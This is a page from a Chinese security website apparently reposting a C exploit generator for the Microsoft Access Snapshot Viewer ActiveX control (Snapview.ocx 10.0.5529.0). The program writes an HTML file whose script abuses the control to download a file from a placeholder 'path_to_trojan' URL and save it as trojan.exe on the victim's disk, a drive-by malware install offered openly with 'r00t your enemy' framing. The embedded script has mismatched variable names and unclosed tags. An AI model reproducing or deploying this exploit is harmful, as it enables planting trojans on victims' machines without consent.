• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit ,其中包含Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit 等知识点,遇到此问题的同学们可以参考下
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
Download nice binaries into an arbitrary box
Vulnerability discovered by Oliver Lavery
http://www.securityfocus.com/bid/8536/info
Remote: Yes
greetz to str0ke */ #include <stdio.h>
#include <stdlib.h>
#define Filename "Ms-Access-SnapShot.html"
FILE *File;
char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object>\n"
"<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
"var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
"attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
"<script>\n<html>"; int main ()
{
printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
printf("**c0ded by callAX**\n");
printf("**r00t your enemy .| **"); FILE *File;
char *b0fer; if ( (File = fopen(Filename,"w b")) == NULL ) {
printf("\n fopen() error");
exit(1);
} b0fer = (char*)malloc(strlen(data));
memcpy(b0fer,data,sizeof(data)-1);
fwrite(b0fer, strlen(data), 1,File);
fclose(File); printf("\n\n" Filename " has been created.\n");
return 0;
}

</div>

您可能想查找下面的文章:

相关文章

  • Dreampics Builder (page) Remote SQL Injection Vulnerability
  • Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
  • fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
  • Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
  • Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day
  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
  • GeekLog
  • tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
  • Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Joomla Component n-forms 1.01 Blind SQL Injection Exploit
    • WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
    • Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
    • pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability
    • MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
    • Bilboblog 2.1 Multiple Remote Vulnerabilities
    • Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
    • Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
    • Maian Search
    • 终端技巧 终端机常见绕过沙盘方法

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有